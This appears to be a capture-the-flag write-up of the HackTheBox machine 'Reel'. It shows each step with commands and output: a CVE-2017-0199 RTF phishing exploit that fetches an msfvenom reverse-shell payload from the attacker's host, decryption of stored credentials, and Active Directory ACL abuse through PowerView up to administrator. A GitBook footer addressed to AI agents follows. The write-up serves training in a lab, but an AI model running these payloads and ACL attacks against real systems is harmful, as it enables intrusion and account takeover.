> For the complete documentation index, see [llms.txt](https://rouvin.gitbook.io/ibreakstuff/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/hard/reel.md). # Reel ## Gaining Access Nmap scan: ``` $ nmap -p- --min-rate 5000 -Pn 10.129.76.206 Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-16 09:29 +08 Nmap scan report for 10.129.76.206 Host is up (0.025s latency). Not shown: 65527 filtered tcp ports (no-response) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 593/tcp open http-rpc-epmap 49159/tcp open unknown ``` Interesting ports that are open, as both SMTP and FTP are present. ### FTP Anonymous Login This FTP instance allows for anonymous logins: ``` $ ftp 10.129.76.206 Connected to 10.129.76.206. 220 Microsoft FTP Service Name (10.129.76.206:kali): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||41000|) 125 Data connection already open; Transfer starting. 05-29-18 12:19AM documents ftp> cd documents 250 CWD command successful. ftp> ls 229 Entering Extended Passive Mode (|||41001|) 125 Data connection already open; Transfer starting. 05-29-18 12:19AM 2047 AppLocker.docx 05-28-18 02:01PM 124 readme.txt 10-31-17 10:13PM 14581 Windows Event Forwarding.docx ``` We can download all of these files here. The `readme.txt` file tells us that the first step is phishing. ``` $ cat readme.txt please email me any rtf format procedures - I'll review and convert. new format / converted documents will be saved here. ``` The `AppLocker.docx` file just states that AppLocker is in place:
The last file cannot be opened for some reason. The most interesting thing about it is the metadata extracted with `exiftool`: ``` $ exiftool Windows\ Event\ Forwarding.docx ExifTool Version Number : 12.57 File Name : Windows Event Forwarding.docx Directory : . File Size : 15 kB File Modification Date/Time : 2017:11:01 05:13:23+08:00 File Access Date/Time : 2023:06:16 09:31:05+08:00 File Inode Change Date/Time : 2023:06:16 09:31:05+08:00 File Permissions : -rw-r--r-- File Type : DOCX File Type Extension : docx MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document Zip Required Version : 20 Zip Bit Flag : 0x0006 Zip Compression : Deflated Zip Modify Date : 1980:01:01 00:00:00 Zip CRC : 0x82872409 Zip Compressed Size : 385 Zip Uncompressed Size : 1422 Zip File Name : [Content_Types].xml Creator : nico@megabank.com ``` We have one email here, and it's likely that we need to send our RTF file to `nico`. ### CVE-2017-0199 RTF Exploit This box is quite old and came out back in 2018, so any public exploits used will have to come from around that time. I googled for 'RTF CVE Exploits', and found quite a few. There was one in 2023, but obviously it isn't the intended attack vector. I came across this article detailing about an RCE exploit in Microsoft Office using RTF files: {% embed url="" %} Googling for PoCs for this exploit leads me to this somewhat popular repository: {% embed url="" %} Following the instructions, we can first generate a payload using `msfvenom`. Earlier, we saw that AppLocker is in place for most executables and scripts, and this exploit allows multiple other methods of getting RCE, such as generating a `hta` file. ``` $ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.42 lport=443 -f hta-psh > shell.hta [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of hta-psh file: 7263 bytes ``` We can host this file on our own Python HTTP server. Then, generate the RTF file required: ``` $ python2 cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.10.14.42/shell.hta -x 1 Generating obfuscated RTF file. Generated obfuscated Invoice.rtf successfull ``` Afterwards, we just need to use `sendEmail` with the file attached. ``` $ sendEmail -f user@megabank.com -t nico@megabank.com -u "Invoice" -a Invoice.rtf -s 10.129.76.206 Reading message body from STDIN because the '-m' option was not used. If you are manually typing in a message: - First line must be received within 60 seconds. - End manual input with a CTRL-D on its own line. hello nico Jun 16 09:45:50 kali sendEmail[7797]: Message input complete. Jun 16 09:46:01 kali sendEmail[7797]: Email was sent successfully! ``` I tried this a few times, and it seems to only work when we use the `-x 0` flag instead. When changed, we can get a reverse shell as the user:
## Privilege Escalation ### Tom Creds Within the user's directory, there's a `cred.xml` file present: ``` C:\Users\nico\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is CEBA-B613 Directory of C:\Users\nico\Desktop 28/05/2018 21:07 . 28/05/2018 21:07 .. 28/10/2017 00:59 1,468 cred.xml 16/06/2023 02:28 34 user.txt ``` When viewed, it contains credentials for the `tom` user: {% code overflow="wrap" %} ``` C:\Users\nico\Desktop>type cred.xml type cred.xml System.Management.Automation.PSCredential System.Object System.Management.Automation.PSCredential HTB\Tom 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692 ``` {% endcode %} Since this is a Powershell generated XML file, we can use the `Import-Clixml` cmdlet to decode it. ```powershell C:\Users\nico\Desktop>powershell -c "$credentials = Import-Clixml -Path cred.xml; $credentials.GetNetworkCredential().password" powershell -c "$credentials = Import-Clixml -Path cred.xml; $credentials.GetNetworkCredential().password" 1ts-mag1c!!! ``` Using this password, we can `ssh` in as `tom`.
### Bloodhound -> WriteOwner The user `tom` is part of multiple AD groups: ``` tom@REEL C:\Users\tom>net user tom User name tom Full Name Tom Hanson Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/28/2017 12:10:42 AM Password expires Never Password changeable 10/29/2017 12:10:42 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 6/16/2023 2:56:58 AM Logon hours allowed All Local Group Memberships *Print Operators Global Group memberships *Domain Users *SharePoint_Admins *MegaBank_Users *DR_Site *HelpDesk_Admins *Restrictions ``` The desktop also contains some interesting files: ``` tom@REEL C:\Users\tom\Desktop>dir Volume in drive C has no label. Volume Serial Number is CEBA-B613 Directory of C:\Users\tom\Desktop 05/29/2018 08:57 PM . 05/29/2018 08:57 PM .. 05/29/2018 09:02 PM AD Audit tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt Findings: Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query) . Maybe we should re-run Cypher query against other groups we've created. tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>dir Volume in drive C has no label. Volume Serial Number is CEBA-B613 Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors 05/29/2018 08:57 PM . 05/29/2018 08:57 PM .. 11/17/2017 12:50 AM 112,225 acls.csv 10/28/2017 09:50 PM 3,549 BloodHound.bin 10/24/2017 04:27 PM 246,489 BloodHound_Old.ps1 10/24/2017 04:27 PM 568,832 SharpHound.exe 10/24/2017 04:27 PM 636,959 SharpHound.ps1 ``` So there's already a `csv` file present with the ACLs we need. I transferred file back to my machine via `smbserver.py`, and opened it in `libreoffice`. Then, I searched for the user `tom` to see if they had any permissions. I found that our current user has WriteOwner permissions over the user `claire`.
This would mean that `tom` can add permissions over `claire`, of which we don't have any yet. To abuse this, we first need to set `tom` as the owner of the ACLs over `claire` using PowerView. Oddly, there's a copy of PowerView on the machine already: ``` tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>dir Volume in drive C has no label. Volume Serial Number is CEBA-B613 Directory of C:\Users\tom\Desktop\AD Audit\BloodHound 05/30/2018 12:44 AM . 05/30/2018 12:44 AM .. 06/16/2023 03:09 AM Ingestors 10/30/2017 11:15 PM 769,587 PowerView.ps1 ``` I originally tried copying over my own copy and executing it, but AppLocker kept blocking me. However, using the already present script works. We can then abuse this ACL by setting `tom` as the object owner and changing passwords of `claire`: ```powershell Set-DomainObjectOwner -Identity claire -OwnerIdentity tom Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword $cred = ConvertTo-SecureString 'Password@123' -AsPlainText -Force Set-DomainUserPassword -identity claire -accountpassword $cred ``` Afterwards, we can `ssh` in as `claire` using this password.
### WriteDacl -> Admin Creds The user `claire` is part of another group. ``` claire@REEL C:\Users\claire>net user claire User name claire Full Name Claire Danes Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/16/2023 3:16:53 AM Password expires Never Password changeable 6/17/2023 3:16:53 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 6/16/2023 3:18:04 AM Logon hours allowed All Local Group Memberships *Hyper-V Administrator Global Group memberships *Domain Users *MegaBank_Users *DR_Site *Restrictions ``` Checking back on the Bloodhound output, we see that `claire` has WriteDacl permissions over the Backup Admins group:
This means that the user `claire` can modify the ACLs of the group, which includes adding and removing users. ``` claire@REEL C:\Users\claire>net group Backup_Admins claire /add /domain The command completed successfully. claire@REEL C:\Users\claire>net group Backup_Admins Group name Backup_Admins Comment Members ------------------------------------------------------------------------------- claire ranj The command completed successfully. ``` We can then check the ACLs of the `C:\users\administrator` directory: ``` claire@REEL C:\Users>icacls Administrator Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F) HTB\Backup_Admins:(OI)(CI)(F) HTB\Administrator:(OI)(CI)(F) BUILTIN\Administrators:(OI)(CI)(F) Successfully processed 1 files; Failed processing 0 files ``` We can view the files present in the Desktop, but we cannot read the root flag. ``` claire@REEL C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is CEBA-B613 Directory of C:\Users\Administrator\Desktop 01/21/2018 03:56 PM . 01/21/2018 03:56 PM .. 11/02/2017 10:47 PM Backup Scripts 06/16/2023 02:28 AM 34 root.txt ``` The Backup Scripts folder contains some interesting files, and one contains the admin password: ``` claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>dir Volume in drive C has no label. Volume Serial Number is CEBA-B613 Directory of C:\Users\Administrator\Desktop\Backup Scripts 11/02/2017 10:47 PM . 11/02/2017 10:47 PM .. 11/04/2017 12:22 AM 845 backup.ps1 11/02/2017 10:37 PM 462 backup1.ps1 11/04/2017 12:21 AM 5,642 BackupScript.ps1 11/02/2017 10:43 PM 2,791 BackupScript.zip 11/04/2017 12:22 AM 1,855 folders-system-state.txt 11/04/2017 12:22 AM 308 test2.ps1.txt claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>type BackupScript.ps1 # admin password $password="Cr4ckMeIfYouC4n!" ``` We can then login as the administrator user:
Rooted! --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/hard/reel.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.